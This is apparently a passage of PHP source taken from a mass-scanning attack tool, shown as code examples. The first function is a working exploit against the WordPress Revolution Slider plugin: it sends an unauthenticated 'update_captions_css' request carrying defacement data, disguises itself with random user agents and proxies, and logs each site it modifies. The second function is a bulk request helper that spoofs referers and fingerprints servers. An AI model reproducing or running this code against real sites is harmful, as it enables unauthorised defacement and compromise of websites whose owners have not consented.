function __request($__)
{
    $curlxpl = curl_init();
    curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php");
    !is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL;
    curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom());
    curl_setopt($curlxpl, CURLOPT_POST, 1);
    curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => $__['deface']));
    curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log');
    curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log');
    $result = curl_exec($curlxpl) . __plus();
    if (eregi('true', $result)) {
        $h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
        echo "[!] [INFO] Success Exploit!\n";
        echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n";
        __plus();
        file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND);
    } else {
        echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n";
    }
    curl_close($curlxpl);
    unset($curlxpl);
}
Ejemplo n.º 2
0
function __request_info($url_, $proxy = NULL, $postDados = NULL)
{
    $url_ = __crypt($url_);
    $mh = curl_multi_init();
    $curl_array = array();
    $nodes = is_array($url_) ? $url_ : array($url_);
    foreach ($nodes as $i => $url) {
        $curl_array[$i] = curl_init($url);
        __plus();
        //FORMATANDO POST & EXECUTANDO urlencode EM CADA VALOR DO POST.
        if (not_isnull_empty($postDados) && is_array($postDados)) {
            foreach ($postDados as $campo => $valor) {
                $postDados_format .= "{$campo}=" . urlencode($valor) . '&';
            }
            $postDados_format = rtrim($postDados_format, '&');
            curl_setopt($curl_array[$i], CURLOPT_POST, count($postDados));
            curl_setopt($curl_array[$i], CURLOPT_POSTFIELDS, __crypt($postDados_format));
        }
        curl_setopt($curl_array[$i], CURLOPT_HTTPHEADER, array_merge(not_isnull_empty($_SESSION['config']['http-header']) ? explode(',', __crypt($_SESSION['config']['http-header'])) : array(), array("Cookie: disclaimer_accepted=true")));
        curl_setopt($curl_array[$i], CURLOPT_USERAGENT, not_isnull_empty($_SESSION['config']['user-agent']) ? __crypt($_SESSION['config']['user-agent']) : __setUserAgentRandom());
        curl_setopt($curl_array[$i], CURLOPT_REFERER, not_isnull_empty($_SESSION['config']['url-reference']) ? __crypt($_SESSION['config']['url-reference']) : __setURLReferenceRandom());
        !is_null($proxy) ? curl_setopt($curl_array[$i], CURLOPT_PROXY, $proxy) : NULL;
        !is_null($_SESSION['config']['verifica_info']) ? curl_setopt($curl_array[$i], CURLOPT_HEADER, 1) : NULL;
        !is_null($_SESSION['config']['verifica_info']) && __validateOptions('3,6', $_SESSION['config']['debug']) ? curl_setopt($curl_array[$i], CURLOPT_VERBOSE, 1) : NULL;
        __plus();
        curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($curl_array[$i], CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($curl_array[$i], CURLOPT_FRESH_CONNECT, 1);
        curl_setopt($curl_array[$i], CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl_array[$i], CURLOPT_CONNECTTIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ? $_SESSION['config']['time-out'] : 5);
        curl_setopt($curl_array[$i], CURLOPT_TIMEOUT, not_isnull_empty($_SESSION['config']['time-out']) ? $_SESSION['config']['time-out'] : 5);
        curl_setopt($curl_array[$i], CURLOPT_COOKIEFILE, not_isnull_empty($_SESSION['config']['file-cookie']) ? $_SESSION['config']['file-cookie'] : 'cookie.txt');
        curl_setopt($curl_array[$i], CURLOPT_COOKIEJAR, not_isnull_empty($_SESSION['config']['file-cookie']) ? $_SESSION['config']['file-cookie'] : 'cookie.txt');
        curl_multi_add_handle($mh, $curl_array[$i]);
    }
    $running = NULL;
    do {
        usleep(100);
        curl_multi_exec($mh, $running);
    } while ($running > 0);
    $ret = array();
    foreach ($nodes as $i => $url) {
        $ret[0] = curl_multi_getcontent($curl_array[$i]);
        $ret[1] = curl_getinfo($curl_array[$i]);
        $ret[2] = curl_error($curl_array[$i]);
    }
    foreach ($nodes as $i => $url) {
        curl_multi_remove_handle($mh, $curl_array[$i]);
    }
    $status = NULL;
    preg_match_all('(HTTP.*)', $ret[0], $status['http']);
    preg_match_all('(Server:.*)', $ret[0], $status['server']);
    preg_match_all('(X-Powered-By:.*)', $ret[0], $status['X-Powered-By']);
    __plus();
    $ret[3] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]}  {$status['X-Powered-By'][0][0]}"));
    __debug(array('debug' => "[ BODY ]{$ret[0]}", 'function' => '__request_info'), 4);
    __plus();
    __debug(array('debug' => "[ URL ]{$url_}", 'function' => '__request_info'), 2);
    __plus();
    curl_multi_close($mh) . unlink('cookie.txt');
    __plus();
    unset($curl_array);
    return isset($ret[0]) ? array('corpo' => $ret[0], 'server' => $ret[1], 'error' => $ret[2], 'info' => $ret[3]) : FALSE;
}